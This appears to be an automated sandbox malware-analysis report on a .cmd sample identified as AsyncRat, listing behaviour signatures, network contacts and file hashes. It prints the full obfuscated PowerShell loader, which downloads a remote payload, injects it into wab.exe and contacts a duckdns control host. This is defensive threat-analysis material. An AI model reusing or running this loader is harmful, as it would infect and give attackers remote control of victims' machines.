Analysis Overview
SHA256
e199e310df7ed728f62ded7f850def8787e53b2e35a3534d20409976dfa87728
Threat Level: Known bad
The file e199e310df7ed728f62ded7f850def8787e53b2e35a3534d20409976dfa87728.cmd was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of SetThreadContext
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-24 13:19
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-24 13:19
Reported
2024-05-24 13:22
Platform
win7-20240221-en
Max time kernel
146s
Max time network
150s
Command Line
Signatures
AsyncRat
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2468 set thread context of 384 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\e199e310df7ed728f62ded7f850def8787e53b2e35a3534d20409976dfa87728.cmd"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "$Vanddraabes = 1;$Precautioning='Sub';$Precautioning+='strin';$Precautioning+='g';Function Forfladigelsens($Tusmrkets152){$Tsp=$Tusmrkets152.Length-$Vanddraabes;For($velours=5;$velours -lt $Tsp;$velours+=6){$Ventin+=$Tusmrkets152.$Precautioning.Invoke( $velours, $Vanddraabes);}$Ventin;}function Inddatafiler223($Dorathea){. ($Rull) ($Dorathea);}$Gianthood=Forfladigelsens ' Ame.MBirtho terszunchaiEnepilSynkrlReassaGasco/ Pan,5Gub.e. Stat0Sjlen Stab,(Tilh,WGod eiVilstn kompd UndeoSalpiwH lhes Symp G njaNSp,ciTReam. maal1genne0matem.Euro,0 Norm;Hed,s HjnelW iegfiPneu n Opfl6Preim4induk;Cleis unc,nxDecon6 Glob4Unbra;Stutt Krsenr.ybbjvMatri:Tende1F rku2 Lejl1Under.Impu.0Gy,ur)ordre redepGRela.eStaalc rofokB,nhao Cart/Cy ni2.ubdi0Ag ic1.emix0Re.ie0Myrmi1Under0 yndi1 Lyst AnticF UnshiSylphrur.nvePhotof Te to Akkox Stup/Pleje1 Purc2 Cela1Ko,me.Enarb0,orca ';$Varmepudes=Forfladigelsens ' ammeUDelitsWatere.ejdsrDemon- UnreALeap gHennee UltrnIrreftLandb ';$Radernes=Forfladigelsens 'SpildhKrsustSotadtPreinp ,lamsTillb:Satis/ Gust/Shamew mergwHierowGend..Scia s ResyeReinfn IndkdQueevsDdsdopE cepaevangcGyptoeErnri.OffercUnf.ioOv.rbmBrugs/VandepUnf lrLsri.oSubst/Censud Prehl.arak/Mccar7LinalyRdkriiUnpe,2Se,vif Dewwu ety ';$Koglespillets=Forfladigelsens 'Flyvn>Overb ';$Rull=Forfladigelsens 'K emsiTvilleCampbxmodul ';$Hvervende='Limpindene';$Bondages = Forfladigelsens 'Forvae,uculcPredohmar,no Stan Hande%hvidvaTrio,pCampsp Unt dwhupoa ,ntetSprudaHyper% ieth\Te,tiPAnstrrRestaeTysseaSyconfNyklaf FdeaiSecanrOksekmPicayaB,saat TubeiAttrivMunkeeMadag.OvercSUndeppLapidoK.pit Dulge&Dimme& Betu Aabene ViolcSaumohzenogoCh,pp Godl,tRyota ';Inddatafiler223 (Forfladigelsens 'Ant a$SandwgFac,il,rojeo anaabTrskeaBilfrl Nons:Chl,rT Un,erEjakuoVed umMissolMatche U.denCircudL.lyaeOpsam= Ufor(B.ligcSmudsmfortidBalka Oligo/Skri.c ,ype Krysa$ gejrBTriano.enkrnUaf jdSiph.aAltingAegereGenfosFlip,)Densi ');Inddatafiler223 (Forfladigelsens ' Ena $F ralgForlalStenloBryggb Nonea Un,tlHokus:RanomU udennCreatf UdmuoUdr drDiatokE,dkkeP,eendNmousnAz,cyeSaftfsV.llasS.ces= A.pr$HaspeRFj.rnaSlui.d KommeUnd,frFillin Tubie Sttts Afde.UnhelsMn.dep Ano lTilreiC rpotReflu(orgia$ StjeKCorreosyningKateglBade eLavtrsApporpR.turiHydrolherrel ,apoeExemptInrolsDinos)A ato ');$Radernes=$Unforkedness[0];$Yojuane= (Forfladigelsens '.irma$DissogIndfjl BordoForfebUnconaDonn lCeleb:IndicSByggem BanipBilleiC.alisH.rsktun.eroMar,il .etreQui krPres.nBoha.eK,rne=,larmNNona,eCosufwShort-CriolOkarspb HebejOverde Troccsner,t rypt stagnS R,vaySepa sB.idgt XyloeBinnomGymno.RekviNNoc aeKajentResub.NiveaWDentieRandsb CistCFin llportriFrekveenfamnNondot');$Yojuane+=$Tromlende[1];Inddatafiler223 ($Yojuane);Inddatafiler223 (Forfladigelsens 'Clown$ entrS UnubmRhetipLns.ai Congs SablthusbeoPolynlBacche LedorEmmennHandeeteren. D.phHS,elleEpizzaRiverdStande Maalr silis Trla[Vadeh$Al.idVCor ia AnverUnminm Pe,oeB.pappVakkeuTakstdSublue Potes Dd.a]Mic,o=Kauti$ ShipG RegiiSamleaLyasen CycltCr pihBrockoExpuloRide,dV,cif ');$Squarsonry=Forfladigelsens 'Damps$ PrivSGendrmPh.nep UnsniNeu os TrultAfgrio EleclSyntaebarstrGe.chnFurfueFa cr.MissaD KostoSv.jfwRigsanGluemlUlfbjoCupolaAarskdproroFHoreqiTrappl StemeK,nto(Howls$ UngaR.ositaProtudSkidseen,lerRetsmn s,ineEschesB.ast,Priva$Em erGDesidoParocoBi.lid BuksbasconyBesg eSpins)s mle ';$Goodbye=$Tromlende[0];Inddatafiler223 (Forfladigelsens 'Be,hy$Hutl.gBeniglOve.soCamdebMogstapo.yglSensi:PalamI .hlonafstitIntraeHoatcrpethimLan,meAutodnVrdiesHollatTamoyrPenn uvengeuNonprm Lati5 Tigh3Flust=Ellio(Tira TBort,eKillisPlanltDries- KompPGulliaForbitSjaskhdynej Dibl,$ YikiGTjrekoPolsgo UdendPyramblsesayFlag.eC ole)Aft.e ');while (!$Intermenstruum53) {Inddatafiler223 (Forfladigelsens 'Chir,$ ibrogBli.zle,ektoSpadebSna.kaBoliglL nti:i ternJulemuPlatim Fi,tdRati.aNedfo=.iber$Anke.tChe.irbassiuSintre,orec ') ;Inddatafiler223 $Squarsonry;Inddatafiler223 (Forfladigelsens 'Anth,S Axunt Bak aKon,orEsop.tForsi-NonunSKrukkl.ntepeGrusveEnforpSkrue ,enne4Gangl ');Inddatafiler223 (Forfladigelsens 'Dosse$NaturgsuperlFibroo Met b Pu.laVulcal Torn: Upf,IS.rrenPolystSurfae NonsrBrusemFlydeeFrisenlandisFortrtPou rrS,aaluAp lluUniqumFiref5Burgj3,ncur= Grun(FondsTExcogeEn,elsStimetSpirk-underP CecaaForsatUltr h Par uansg$SelvaG DoleoSo,peo ,hardkommabinjoiyAfprieSkend)Chil, ') ;Inddatafiler223 (Forfladigelsens 'Crabl$vand.gHavnelslidsomanifb YderaFerielImmi.:klapnL C.amaBajadrTeknoy RabunBrugtg CurviFrimrtlysbeuTai psBerti= bra $.lanlgPolarl Repro R krbLivssaFordylStor :S,orkUMetacnInhalm TeleiTropes ,krotFilopaKancek S.skaIndrebBe ynlnazieeSub e+ugand+Supra%Fatn.$DefekU K idn Ven fTilfjoUnderrTrva,kGongleSpintdFgtemnTilt.eSerrasa,cons anon.Hulruc Mul.olametu Sil nBost,tTache ') ;$Radernes=$Unforkedness[$Laryngitus];}$Samojedens=284462;$Stabelstolen=28909;Inddatafiler223 (Forfladigelsens 'Thera$EksklgStikklP ppeoCharlb TriaaGran lKlipp:VarioA.etakcTube,rRo,usu Afgrxgond perli= P pe AconiG,quipe KemitGodk,- GregCSup ooep lonDucklt DomseRemolnCa,iltUn.er Boe,$Spor GRing oImpeto NewfdSuk.ebIntelyHofteeSl,mr ');Inddatafiler223 (Forfladigelsens 'Kanta$ FigggSmutvlDiamaoEnkelb .ushaUko rlLater:Sam eASagnenTjenet SkysiArtissRatoneTanz mF.ageiS,ibstDipetsDe,ar Unken= Alph Midda[DumheSVattey esmas Bi,tt Subme T.nemOut,l.DeterC Irraoyeme,n Cod.vindfle HaarrTorpetJe aa]Udste:Sys,o: CeilFSubphr S.peoCliv,mShib.B Udsta ChemsSomate G uc6,efra4LidleSMagiatCountr Arisi Ho pnAugusgS,jen(Stere$Far aAs bircUnknorDaktyu remaxRe,re)mouth ');Inddatafiler223 (Forfladigelsens 'nonph$TonesgTppeflv.lifoGummib Smr.aEp chlHe.lo:.ersoQPolysu P.oga Tubur.yreseHalftn RometHedonePerisn Q adeOtt n .ank=Ordbo Ik af[un urSSkrueyKaktusCo.dit Fer.eExophmMedde.maadeT JerseInterxIndhftAllio. ntenE CharnVrelscSminkoD.ivedScuddiBrnepnVejargenerv] Over:Jenna:BeregA Win,SmarthCSemifI .nknIEnebo. B.stGInopieAtelytApocoSA mlnt krarOversiChok,nCalamgPairm( D,ss$Pa phAWire nFinantHo ekiKi,desUn ueeepistmIndesiPapistmedlesNonp,) ecur ');Inddatafiler223 (Forfladigelsens 'Winep$ AfvrgUn,arlUddanoSpoejb .amiaChoktlskabe:TvrdrVMandoaB.bler AdvomA etotBroomv CribaEthalnSymbodBervesAmygdbSyddaaJac.rdBevgeeDis,iaForbrnDaases SdvatTelphaHi.selBe potK,adrebrambnGimle=Serie$AlcyoQOsmomuS,ksaaLegeor ObjeeAnthenHomott Bas,eRabatnJoenseKvote. Ush s I.dkuReddsb GhafsSmit.tStormrUn usiDrernn Unasg apit(Flusj$Meta SNummeaDeadpmDrag o ouvrjGer.ieClabudMorbre Stann,avnestunes,Subcu$r,velSen yst.stelaGlacibQ,eereRemonl Palms .andt multo B.rglSoereeV,jrsnUp.al)unsla ');Inddatafiler223 $Varmtvandsbadeanstalten;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Preaffirmative.Spo && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Vanddraabes = 1;$Precautioning='Sub';$Precautioning+='strin';$Precautioning+='g';Function Forfladigelsens($Tusmrkets152){$Tsp=$Tusmrkets152.Length-$Vanddraabes;For($velours=5;$velours -lt $Tsp;$velours+=6){$Ventin+=$Tusmrkets152.$Precautioning.Invoke( $velours, $Vanddraabes);}$Ventin;}function Inddatafiler223($Dorathea){. ($Rull) ($Dorathea);}$Gianthood=Forfladigelsens ' Ame.MBirtho terszunchaiEnepilSynkrlReassaGasco/ Pan,5Gub.e. Stat0Sjlen Stab,(Tilh,WGod eiVilstn kompd UndeoSalpiwH lhes Symp G njaNSp,ciTReam. maal1genne0matem.Euro,0 Norm;Hed,s HjnelW iegfiPneu n Opfl6Preim4induk;Cleis unc,nxDecon6 Glob4Unbra;Stutt Krsenr.ybbjvMatri:Tende1F rku2 Lejl1Under.Impu.0Gy,ur)ordre redepGRela.eStaalc rofokB,nhao Cart/Cy ni2.ubdi0Ag ic1.emix0Re.ie0Myrmi1Under0 yndi1 Lyst AnticF UnshiSylphrur.nvePhotof Te to Akkox Stup/Pleje1 Purc2 Cela1Ko,me.Enarb0,orca ';$Varmepudes=Forfladigelsens ' ammeUDelitsWatere.ejdsrDemon- UnreALeap gHennee UltrnIrreftLandb ';$Radernes=Forfladigelsens 'SpildhKrsustSotadtPreinp ,lamsTillb:Satis/ Gust/Shamew mergwHierowGend..Scia s ResyeReinfn IndkdQueevsDdsdopE cepaevangcGyptoeErnri.OffercUnf.ioOv.rbmBrugs/VandepUnf lrLsri.oSubst/Censud Prehl.arak/Mccar7LinalyRdkriiUnpe,2Se,vif Dewwu ety ';$Koglespillets=Forfladigelsens 'Flyvn>Overb ';$Rull=Forfladigelsens 'K emsiTvilleCampbxmodul ';$Hvervende='Limpindene';$Bondages = Forfladigelsens 'Forvae,uculcPredohmar,no Stan Hande%hvidvaTrio,pCampsp Unt dwhupoa ,ntetSprudaHyper% ieth\Te,tiPAnstrrRestaeTysseaSyconfNyklaf FdeaiSecanrOksekmPicayaB,saat TubeiAttrivMunkeeMadag.OvercSUndeppLapidoK.pit Dulge&Dimme& Betu Aabene ViolcSaumohzenogoCh,pp Godl,tRyota ';Inddatafiler223 (Forfladigelsens 'Ant a$SandwgFac,il,rojeo anaabTrskeaBilfrl Nons:Chl,rT Un,erEjakuoVed umMissolMatche U.denCircudL.lyaeOpsam= Ufor(B.ligcSmudsmfortidBalka Oligo/Skri.c ,ype Krysa$ gejrBTriano.enkrnUaf jdSiph.aAltingAegereGenfosFlip,)Densi ');Inddatafiler223 (Forfladigelsens ' Ena $F ralgForlalStenloBryggb Nonea Un,tlHokus:RanomU udennCreatf UdmuoUdr drDiatokE,dkkeP,eendNmousnAz,cyeSaftfsV.llasS.ces= A.pr$HaspeRFj.rnaSlui.d KommeUnd,frFillin Tubie Sttts Afde.UnhelsMn.dep Ano lTilreiC rpotReflu(orgia$ StjeKCorreosyningKateglBade eLavtrsApporpR.turiHydrolherrel ,apoeExemptInrolsDinos)A ato ');$Radernes=$Unforkedness[0];$Yojuane= (Forfladigelsens '.irma$DissogIndfjl BordoForfebUnconaDonn lCeleb:IndicSByggem BanipBilleiC.alisH.rsktun.eroMar,il .etreQui krPres.nBoha.eK,rne=,larmNNona,eCosufwShort-CriolOkarspb HebejOverde Troccsner,t rypt stagnS R,vaySepa sB.idgt XyloeBinnomGymno.RekviNNoc aeKajentResub.NiveaWDentieRandsb CistCFin llportriFrekveenfamnNondot');$Yojuane+=$Tromlende[1];Inddatafiler223 ($Yojuane);Inddatafiler223 (Forfladigelsens 'Clown$ entrS UnubmRhetipLns.ai Congs SablthusbeoPolynlBacche LedorEmmennHandeeteren. D.phHS,elleEpizzaRiverdStande Maalr silis Trla[Vadeh$Al.idVCor ia AnverUnminm Pe,oeB.pappVakkeuTakstdSublue Potes Dd.a]Mic,o=Kauti$ ShipG RegiiSamleaLyasen CycltCr pihBrockoExpuloRide,dV,cif ');$Squarsonry=Forfladigelsens 'Damps$ PrivSGendrmPh.nep UnsniNeu os TrultAfgrio EleclSyntaebarstrGe.chnFurfueFa cr.MissaD KostoSv.jfwRigsanGluemlUlfbjoCupolaAarskdproroFHoreqiTrappl StemeK,nto(Howls$ UngaR.ositaProtudSkidseen,lerRetsmn s,ineEschesB.ast,Priva$Em erGDesidoParocoBi.lid BuksbasconyBesg eSpins)s mle ';$Goodbye=$Tromlende[0];Inddatafiler223 (Forfladigelsens 'Be,hy$Hutl.gBeniglOve.soCamdebMogstapo.yglSensi:PalamI .hlonafstitIntraeHoatcrpethimLan,meAutodnVrdiesHollatTamoyrPenn uvengeuNonprm Lati5 Tigh3Flust=Ellio(Tira TBort,eKillisPlanltDries- KompPGulliaForbitSjaskhdynej Dibl,$ YikiGTjrekoPolsgo UdendPyramblsesayFlag.eC ole)Aft.e ');while (!$Intermenstruum53) {Inddatafiler223 (Forfladigelsens 'Chir,$ ibrogBli.zle,ektoSpadebSna.kaBoliglL nti:i ternJulemuPlatim Fi,tdRati.aNedfo=.iber$Anke.tChe.irbassiuSintre,orec ') ;Inddatafiler223 $Squarsonry;Inddatafiler223 (Forfladigelsens 'Anth,S Axunt Bak aKon,orEsop.tForsi-NonunSKrukkl.ntepeGrusveEnforpSkrue ,enne4Gangl ');Inddatafiler223 (Forfladigelsens 'Dosse$NaturgsuperlFibroo Met b Pu.laVulcal Torn: Upf,IS.rrenPolystSurfae NonsrBrusemFlydeeFrisenlandisFortrtPou rrS,aaluAp lluUniqumFiref5Burgj3,ncur= Grun(FondsTExcogeEn,elsStimetSpirk-underP CecaaForsatUltr h Par uansg$SelvaG DoleoSo,peo ,hardkommabinjoiyAfprieSkend)Chil, ') ;Inddatafiler223 (Forfladigelsens 'Crabl$vand.gHavnelslidsomanifb YderaFerielImmi.:klapnL C.amaBajadrTeknoy RabunBrugtg CurviFrimrtlysbeuTai psBerti= bra $.lanlgPolarl Repro R krbLivssaFordylStor :S,orkUMetacnInhalm TeleiTropes ,krotFilopaKancek S.skaIndrebBe ynlnazieeSub e+ugand+Supra%Fatn.$DefekU K idn Ven fTilfjoUnderrTrva,kGongleSpintdFgtemnTilt.eSerrasa,cons anon.Hulruc Mul.olametu Sil nBost,tTache ') ;$Radernes=$Unforkedness[$Laryngitus];}$Samojedens=284462;$Stabelstolen=28909;Inddatafiler223 (Forfladigelsens 'Thera$EksklgStikklP ppeoCharlb TriaaGran lKlipp:VarioA.etakcTube,rRo,usu Afgrxgond perli= P pe AconiG,quipe KemitGodk,- GregCSup ooep lonDucklt DomseRemolnCa,iltUn.er Boe,$Spor GRing oImpeto NewfdSuk.ebIntelyHofteeSl,mr ');Inddatafiler223 (Forfladigelsens 'Kanta$ FigggSmutvlDiamaoEnkelb .ushaUko rlLater:Sam eASagnenTjenet SkysiArtissRatoneTanz mF.ageiS,ibstDipetsDe,ar Unken= Alph Midda[DumheSVattey esmas Bi,tt Subme T.nemOut,l.DeterC Irraoyeme,n Cod.vindfle HaarrTorpetJe aa]Udste:Sys,o: CeilFSubphr S.peoCliv,mShib.B Udsta ChemsSomate G uc6,efra4LidleSMagiatCountr Arisi Ho pnAugusgS,jen(Stere$Far aAs bircUnknorDaktyu remaxRe,re)mouth ');Inddatafiler223 (Forfladigelsens 'nonph$TonesgTppeflv.lifoGummib Smr.aEp chlHe.lo:.ersoQPolysu P.oga Tubur.yreseHalftn RometHedonePerisn Q adeOtt n .ank=Ordbo Ik af[un urSSkrueyKaktusCo.dit Fer.eExophmMedde.maadeT JerseInterxIndhftAllio. ntenE CharnVrelscSminkoD.ivedScuddiBrnepnVejargenerv] Over:Jenna:BeregA Win,SmarthCSemifI .nknIEnebo. B.stGInopieAtelytApocoSA mlnt krarOversiChok,nCalamgPairm( D,ss$Pa phAWire nFinantHo ekiKi,desUn ueeepistmIndesiPapistmedlesNonp,) ecur ');Inddatafiler223 (Forfladigelsens 'Winep$ AfvrgUn,arlUddanoSpoejb .amiaChoktlskabe:TvrdrVMandoaB.bler AdvomA etotBroomv CribaEthalnSymbodBervesAmygdbSyddaaJac.rdBevgeeDis,iaForbrnDaases SdvatTelphaHi.selBe potK,adrebrambnGimle=Serie$AlcyoQOsmomuS,ksaaLegeor ObjeeAnthenHomott Bas,eRabatnJoenseKvote. Ush s I.dkuReddsb GhafsSmit.tStormrUn usiDrernn Unasg apit(Flusj$Meta SNummeaDeadpmDrag o ouvrjGer.ieClabudMorbre Stann,avnestunes,Subcu$r,velSen yst.stelaGlacibQ,eereRemonl Palms .andt multo B.rglSoereeV,jrsnUp.al)unsla ');Inddatafiler223 $Varmtvandsbadeanstalten;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Preaffirmative.Spo && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.sendspace.com | udp |
| US | 172.67.170.105:443 | www.sendspace.com | tcp |
| US | 8.8.8.8:53 | fs03n3.sendspace.com | udp |
| CA | 69.31.136.17:443 | fs03n3.sendspace.com | tcp |
| US | 8.8.8.8:53 | crt.sectigo.com | udp |
| US | 172.64.149.23:80 | crt.sectigo.com | tcp |
| US | 172.67.170.105:443 | www.sendspace.com | tcp |
| US | 8.8.8.8:53 | fs03n5.sendspace.com | udp |
| CA | 69.31.136.17:443 | fs03n5.sendspace.com | tcp |
| US | 8.8.8.8:53 | xvern429.duckdns.org | udp |
| US | 12.202.180.134:8890 | xvern429.duckdns.org | tcp |
Files
memory/2000-4-0x000007FEF58DE000-0x000007FEF58DF000-memory.dmp
memory/2000-5-0x000000001B840000-0x000000001BB22000-memory.dmp
memory/2000-6-0x0000000001D80000-0x0000000001D88000-memory.dmp
memory/2000-7-0x000007FEF5620000-0x000007FEF5FBD000-memory.dmp
memory/2000-8-0x000007FEF5620000-0x000007FEF5FBD000-memory.dmp
memory/2000-9-0x000007FEF5620000-0x000007FEF5FBD000-memory.dmp
memory/2000-11-0x000007FEF5620000-0x000007FEF5FBD000-memory.dmp
memory/2000-10-0x000007FEF5620000-0x000007FEF5FBD000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 29f65ba8e88c063813cc50a4ea544e93 |
| SHA1 | 05a7040d5c127e68c25d81cc51271ffb8bef3568 |
| SHA256 | 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184 |
| SHA512 | e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa |
C:\Users\Admin\AppData\Local\Temp\Tar307A.tmp
| MD5 | 435a9ac180383f9fa094131b173a2f7b |
| SHA1 | 76944ea657a9db94f9a4bef38f88c46ed4166983 |
| SHA256 | 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34 |
| SHA512 | 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BT882B7A56PPU8YNELAW.temp
| MD5 | 61bfc6cb9342a6f706458473f33897a1 |
| SHA1 | fbaaff0e17ee98640b7d4d174fa5b092557dee80 |
| SHA256 | 18261797c323787e3c5dbccb44a7cb95386c72be7ce7e190bfde5d1dd5259b00 |
| SHA512 | 9769b2b8bec869db85b1a1e352dbbcd6e40b03edabce60d647425d84bdc3e1859b41a17439436271f3cd2809b91f995639282d62303ca52003cac7171005a974 |
C:\Users\Admin\AppData\Roaming\Preaffirmative.Spo
| MD5 | 2012051e619942968ded1f085ec39637 |
| SHA1 | f90b37de2d7d3a42be724ede56fcaebf200b18e8 |
| SHA256 | cb6359c5489ad4e7eabe7ee810752d2ae5d305cf060ad345950cbbc9f9460c82 |
| SHA512 | 17f73368229c4f7daea3ef2d6e1d7ae75b06571ad0576a556b49e50634aa065e49dafa95eb5da4af0d393619abed8a68a92928c5797f240ce799bc93e0aeb053 |
memory/2468-58-0x00000000065D0000-0x0000000008106000-memory.dmp
memory/2000-59-0x000007FEF5620000-0x000007FEF5FBD000-memory.dmp
memory/2000-60-0x000007FEF58DE000-0x000007FEF58DF000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 90a24f720152d29a133da27b6fd0dd04 |
| SHA1 | c4e6424516dbf39806901d66883189a04cb3e40f |
| SHA256 | 111395bd316b6eb77774f94795695dbdf1ab506259c9170cc712b6650183bde7 |
| SHA512 | 9a7d59191ca1f930d831e380bd9ae022c3a2e9b3d7f7ac4406bec6a1b467bf6dcc54297cb4628d2e4de08787148772c82803ad4c400a449b8e85cc7f2024d890 |
memory/384-88-0x0000000000BD0000-0x0000000001C32000-memory.dmp
memory/2000-89-0x000007FEF5620000-0x000007FEF5FBD000-memory.dmp
memory/384-90-0x0000000000BD0000-0x0000000000BE6000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-24 13:19
Reported
2024-05-24 13:22
Platform
win10v2004-20240508-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
AsyncRat
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4668 set thread context of 4276 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e199e310df7ed728f62ded7f850def8787e53b2e35a3534d20409976dfa87728.cmd"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "$Vanddraabes = 1;$Precautioning='Sub';$Precautioning+='strin';$Precautioning+='g';Function Forfladigelsens($Tusmrkets152){$Tsp=$Tusmrkets152.Length-$Vanddraabes;For($velours=5;$velours -lt $Tsp;$velours+=6){$Ventin+=$Tusmrkets152.$Precautioning.Invoke( $velours, $Vanddraabes);}$Ventin;}function Inddatafiler223($Dorathea){. ($Rull) ($Dorathea);}$Gianthood=Forfladigelsens ' Ame.MBirtho terszunchaiEnepilSynkrlReassaGasco/ Pan,5Gub.e. Stat0Sjlen Stab,(Tilh,WGod eiVilstn kompd UndeoSalpiwH lhes Symp G njaNSp,ciTReam. maal1genne0matem.Euro,0 Norm;Hed,s HjnelW iegfiPneu n Opfl6Preim4induk;Cleis unc,nxDecon6 Glob4Unbra;Stutt Krsenr.ybbjvMatri:Tende1F rku2 Lejl1Under.Impu.0Gy,ur)ordre redepGRela.eStaalc rofokB,nhao Cart/Cy ni2.ubdi0Ag ic1.emix0Re.ie0Myrmi1Under0 yndi1 Lyst AnticF UnshiSylphrur.nvePhotof Te to Akkox Stup/Pleje1 Purc2 Cela1Ko,me.Enarb0,orca ';$Varmepudes=Forfladigelsens ' ammeUDelitsWatere.ejdsrDemon- UnreALeap gHennee UltrnIrreftLandb ';$Radernes=Forfladigelsens 'SpildhKrsustSotadtPreinp ,lamsTillb:Satis/ 